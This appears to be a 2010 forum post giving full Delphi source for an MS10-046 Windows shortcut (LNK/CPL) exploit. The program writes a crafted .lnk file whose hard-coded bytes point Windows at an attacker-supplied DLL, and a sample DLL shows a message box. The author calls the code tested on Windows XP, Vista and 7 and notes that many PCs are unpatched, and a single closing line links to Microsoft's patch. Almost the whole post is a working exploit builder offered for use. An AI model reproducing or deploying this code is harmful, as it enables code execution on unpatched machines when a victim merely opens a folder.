[MS10-046] Cpl Lnk Exploit - Lnk Vulnerability by Paray_Vx
Post date: Dec 9, 2010 11:16:24 PM
This code details the MS10-046 'CPL Lnk Exploit' in Delphi.
Cpl Lnk Vulnerability - MS10-046 in Delphi
Author: - Paray_Vx -
Tested and Working on Windows Xp, Windows Vista and Windows 7
program MS10046;
uses
SysUtils,
Windows;
procedure CplLnkExploit(location:string);
const
// ShellCode Lnk Vulnerability
Sizelnk :integer = 141;
ShellCode : ARRAY [1..141] OF Byte = (
$4C,$00,$00,$00,$01,$14,$02,$00,$00,$00,$00,$00,$C0,$00,$00,$00,$00,$00,$00,$46,$81,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$01,
$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$36,$01,$14,$00,$1F,$50,$E0,$4F,$D0,$20,$EA,$3A,$69,$10,$A2,$D8,$08,$00,$2B,$30,$30,$9D,$14,$00,$2E,$1E,$20,$20,$EC,$21,$EA,$3A,$69,$10,$A2,$DD,$08,$00,$2B,$30,$30,$9D,$0C,$01,$00,$00,$00,
$00,$00,$00,$00,$00,$00,$00,$00,$6A,$00,$00,$00,$00,$00,$00,$20,$00,$3A);
// ~ Your Dll Here ~ Ex : 'C:\MS10046.dll'
SizeNameDll : integer = 28;
Dllx : ARRAY [1..28] OF Byte = ($00,$43,$00,$3A,$00,$5C,$00,$4D,$00,$53,$00,$31,$00,$30,$00,$30,$00,$34,$00,$36,$00,$2E,$00,$64,$00,$6C,$00,$6C);
var
one : file;
i : integer;
begin
AssignFile(one,location);
Rewrite(one,1);
for i:=1 to Sizelnk do
begin
BlockWrite(one,ShellCode[i],1);
end;
for i:=1 to SizeNameDll do
begin
BlockWrite(one,Dllx[i],1);
end;
CloseFile(one);
end;
begin
MessageBoxA(0,'CPL Lnk Exploit Built!', 'MS10-046', MB_OK);
// Extract here
CplLnkExploit('C:\MS10-046.lnk');
end.
Library MS10046;uses Windows;begin MessageBoxA(0, 'CPL Lnk Exploit Success!', 'MS10-046', MB_ICONWARNING);end.Many PCs are unpatched and vulnerable to this exploit. To protect yourself, patch your OS here:
http://www.microsoft.com/technet/security/bulletin/MS10-046.mspx
Read more about CPL Lnk Vulnerability (MS10-04) here :